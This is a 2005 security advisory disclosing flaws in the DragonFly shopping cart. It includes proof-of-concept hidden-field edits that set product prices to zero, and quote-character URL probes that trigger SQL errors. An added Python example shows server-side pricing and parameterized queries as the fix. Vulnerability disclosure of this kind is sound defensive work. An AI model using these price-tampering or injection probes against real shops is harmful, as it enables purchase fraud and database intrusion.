dragonfly.txt

Posted Jul 12, 2005
Authored by Diabolic Crab | Site hackerscenter.com

DragonFly shopping cart allows for SQL injection attacks and price manipulation.

tags | exploit, sql injection
SHA-256 | f3731ee7643b36fa0e65130b16541ef7e07f4dbac260d2b7479a4c697986b967

Dcrab's Security Advisory
http://icis.digitalparadox.org/~dcrab
http://www.hackerscenter.com/

Get Dcrab's Services to audit your Web servers, scripts, networks, etc or even code them. Learn more at http://www.dbtech.org

Severity: High
Title: Dragonfly Shopping Cart Multiple vulnerabilities
Date: 11/07/2005

Vendor: DragonFly Shopping Cart
Vendor Website: http://www.incredibleinteractive.com/Active/dc_Productsview.asp?key=5
Summary: Vulnerabilities exist in Dragonfly Shopping Cart that allow modifying of prices, along with SQL injection vulnerabilities.

Proof of Concept Exploits:

Hidden Price Value Vulnerability
You can modify these hidden fields to change the price of the product, and thus purchase the biggest and most expensive products for the cheapest possible prices, or even for nothing.
/demo/dc_Categorieslist.asp
HPVV

<input type="hidden" name="x_DragonflyCartProductPrice" value="15.49" size="4">



/demo/dc_Categoriesview.asp
HPVV

<input type="hidden" name="x_DragonflyCartProductPrice" value="0" size="4">



/demo/dc_productslist.asp
HPVV

<input type="hidden" name="x_DragonflyCartProductPrice" value="0" size="4">



/demo/dc_productslist_Clearance.asp
HPVV

<input type="hidden" name="x_DragonflyCartProductPrice" value="0" size="4">


There are also many other hidden fields, such as the IP address, which can be used to make the attack "technically" more anonymous, though any normal logging system would catch you ;).



SQL Injections

/demo/dc_Categoriesview.asp??key='&RecPerPage=5

Microsoft JET Database Engine error '80040e07'

Data type mismatch in criteria expression.

/demo/dc_Categoriesview.asp, line 1054



/demo/dc_Categoriesview.asp?key=%26dir%26

Microsoft JET Database Engine error '80040e14'

Syntax error (missing operator) in query expression '[CategoryKey] = &dir&'.

/demo/dc_Categoriesview.asp, line 1054



/demo/dc_productslist_Clearance.asp

Microsoft JET Database Engine error '80040e14'

Syntax error in string in query expression '([ProductActive] = 'show' AND ([ProductClearancePage] = 'yes' AND ProductClearanceStartDate < #7/7/2005# AND ProductClearanceEndDate >= #7/7/2005#)) AND ((([ProductName] LIKE '%1%' OR [ProductDescriptionShort] LIKE '%1%') ' ))'.

/demo/dc_productslist_Clearance.asp, line 292



/demo/dc_productslist_Clearance.asp?cmd=%27

Microsoft JET Database Engine error '80040e14'

Syntax error in string in query expression '([ProductActive] = 'show' AND ([ProductClearancePage] = 'yes' AND ProductClearanceStartDate < #7/7/2005# AND ProductClearanceEndDate >= #7/7/2005#)) AND ((([ProductName] LIKE '%1%' OR [ProductDescriptionShort] LIKE '%1%') ' ))'.

/demo/dc_productslist_Clearance.asp, line 292



/demo/ratings.asp??PID='

Microsoft JET Database Engine error '80040e14'

Syntax error (missing operator) in query expression '[ProductKey]=''.

/demo/ratings.asp, line 68



/demo/dc_Productsview.asp

Microsoft JET Database Engine error '80040e07'

Data type mismatch in criteria expression.

/demo/dc_Productsview.asp, line 931



/demo/dc_forum_Postslist.asp?start='

Microsoft VBScript runtime error '800a000d'

Type mismatch: 'nTotalRecs'

/demo/dc_forum_Postslist.asp, line 319



/demo/dc_forum_Postslist.asp?key_m='

Microsoft JET Database Engine error '80040e07'

Data type mismatch in criteria expression.

/demo/dc_forum_Postslist.asp, line 200



/demo/dc_forum_Postslist.asp?psearch=1&Submit=Search%20%28%2A%29&psearchtype='

Microsoft JET Database Engine error '80040e07'

Data type mismatch in criteria expression.

/demo/dc_forum_Postslist.asp, line 200



/demo/dc_forum_Postslist.asp?psearch='&Submit=Search%20%28%2A%29&psearchtype=1

Microsoft JET Database Engine error '80040e07'

Data type mismatch in criteria expression.

/demo/dc_forum_Postslist.asp, line 200
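
Both findings above come from the server trusting request data: the hidden x_DragonflyCartProductPrice field, and key-style parameters concatenated into Jet queries. The following is an added example, not code from the advisory or from DragonFly, showing a handler that takes the price from the catalog and binds a validated key as a query parameter. Assumptions: Python with sqlite3 stands in for the cart's ASP/Jet stack, and the `qty` field, the `ProductPrice` column and the sample rows are constructed for illustration.

```python
import sqlite3
from decimal import Decimal

def make_catalog():
    """Constructed sample catalog; sqlite3 stands in for the Jet database."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE Products (ProductKey INTEGER PRIMARY KEY, "
               "ProductName TEXT, ProductPrice TEXT)")  # ProductPrice: assumed name
    db.executemany("INSERT INTO Products VALUES (?, ?, ?)",
                   [(1, "Widget", "15.49"), (2, "Gadget", "249.00")])
    return db

def parse_key(raw):
    """Accept only a short ASCII-digit key, so quotes or operators in the
    parameter are rejected before any query is built."""
    if not (isinstance(raw, str) and raw.isascii() and raw.isdigit() and len(raw) <= 9):
        raise ValueError("invalid product key")
    return int(raw)

def price_line_item(db, form):
    """Price one cart line from submitted form fields (a dict of strings).

    The submitted x_DragonflyCartProductPrice never feeds the total; it is
    only compared with the catalog price so tampering can be logged.
    """
    key = parse_key(form.get("key", ""))
    qty = int(form.get("qty", "1"))  # "qty" is a hypothetical field name
    if not 1 <= qty <= 100:
        raise ValueError("invalid quantity")
    # Bound parameter: the key travels as data, never as SQL text.
    row = db.execute("SELECT ProductPrice FROM Products WHERE ProductKey = ?",
                     (key,)).fetchone()
    if row is None:
        raise LookupError("unknown product")
    price = Decimal(row[0])
    submitted = form.get("x_DragonflyCartProductPrice")
    tampered = False
    if submitted is not None:
        try:
            tampered = Decimal(submitted) != price
        except ArithmeticError:  # not a number at all
            tampered = True
    return {"key": key, "unit_price": price, "total": price * qty,
            "tampered": tampered}

if __name__ == "__main__":
    db = make_catalog()
    print(price_line_item(db, {"key": "1", "qty": "2",
                               "x_DragonflyCartProductPrice": "0"}))
```

Returning a generic error page instead of the raw Jet or VBScript message also keeps query fragments and script line numbers, like those quoted above, out of responses.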


Author:
These vulnerabilities have been found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to contact me regarding these vulnerabilities. You can find me at http://www.hackerscenter.com or http://icis.digitalparadox.org/~dcrab. Look out for my soon to come out book on Secure coding with PHP.



--------------------------------------------------------------------------------

Sincerely,
Diabolic Crab
